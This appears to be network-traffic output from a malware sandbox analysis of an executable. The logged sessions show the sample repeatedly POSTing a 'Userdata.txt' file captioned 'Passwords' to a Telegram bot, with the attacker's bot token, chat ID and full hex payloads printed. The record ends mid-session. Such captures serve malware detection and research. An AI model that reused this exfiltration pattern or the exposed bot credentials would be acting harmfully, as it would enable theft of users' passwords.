                                                                                                            6192.168.2.549952149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:41 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31cc23064195
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:53:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 63 32 33 30 36 34 31 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31cc23064195Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:41 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:41 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:41 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44730,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542421,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.549966149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:42 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31de1c6e27df
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:53:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 65 31 63 36 65 32 37 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31de1c6e27dfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:43 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:43 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:43 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44731,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542423,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.549978149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:44 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31f16a1963c9
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 31 36 61 31 39 36 33 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31f16a1963c9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:44 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:44 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 537
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:44 UTC537INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44732,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542424,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.549992149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:46 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3206090b5403
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 36 30 39 30 62 35 34 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3206090b5403Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:46 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:46 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:46 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44733,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542426,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.549994149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:47 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd321939efa937
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:47 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 39 33 39 65 66 61 39 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd321939efa937Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:48 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:48 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:48 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44734,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542428,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.549996149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:49 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd322dba261e7e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:49 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 64 62 61 32 36 31 65 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd322dba261e7eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:50 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:50 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:50 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44735,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542430,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.549998149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:51 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3240cd792635
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 30 63 64 37 39 32 36 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3240cd792635Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:51 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:51 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:51 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44736,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542431,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.550000149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:53 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd325276d5484d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
